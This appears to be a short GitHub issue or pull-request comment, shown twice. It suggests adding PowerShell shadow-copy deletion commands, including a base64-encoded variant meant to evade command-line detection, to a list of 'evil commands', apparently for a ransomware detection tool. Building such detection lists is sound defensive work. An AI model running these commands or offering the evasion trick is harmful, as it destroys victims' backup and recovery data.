Closed Omodaka9375 closed 3 years ago
Other attempts at deleting the shadow copies can be performed via invoking powershell (and WMI) or using an encoded command flag to avoid detection in the command line.
Evi commands: powershell -command "Get-WmiObject Win32Shadowcopy | ForEach-Object {$.Delete();}" powershell.exe -noprofile -encodedCommand R2V0LVdtaU9iamVjdCBXaW4zMl9TaGFkb3djb3B5IHwgRm9yRWFjaC ...
What has been added:
Cheers
Other attempts at deleting the shadow copies can be performed via invoking powershell (and WMI) or using an encoded command flag to avoid detection in the command line.
Evi commands: powershell -command "Get-WmiObject Win32Shadowcopy | ForEach-Object {$.Delete();}" powershell.exe -noprofile -encodedCommand R2V0LVdtaU9iamVjdCBXaW4zMl9TaGFkb3djb3B5IHwgRm9yRWFjaC ...
What has been added:
Cheers